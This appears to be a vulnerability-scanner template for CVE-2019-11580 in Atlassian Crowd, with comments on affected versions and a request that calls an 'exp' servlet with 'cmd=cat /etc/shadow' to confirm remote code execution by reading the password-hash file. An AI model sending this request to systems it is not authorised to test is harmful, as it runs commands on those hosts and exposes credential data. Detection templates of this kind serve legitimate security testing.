id: cve-2019-11580

info:
  name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
  author: dwisiswant0
  severity: critical

  # Atlassian Crowd and Crowd Data Center
  # had the pdkinstall development plugin incorrectly enabled in release builds.
  # Attackers who can send unauthenticated or authenticated requests
  # to a Crowd or Crowd Data Center instance can exploit this vulnerability
  # to install arbitrary plugins, which permits remote code execution on
  # systems running a vulnerable version of Crowd or Crowd Data Center.
  # All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
  # from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
  # from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
  # from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
  # and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
  # -
  # References:
  # > https://github.com/jas502n/CVE-2019-11580

requests:
  - method: GET
    path:
      - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
      - "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:*:"
          - "bin:*:"
        condition: and
        part: body
      - type: status
        status:
          - 200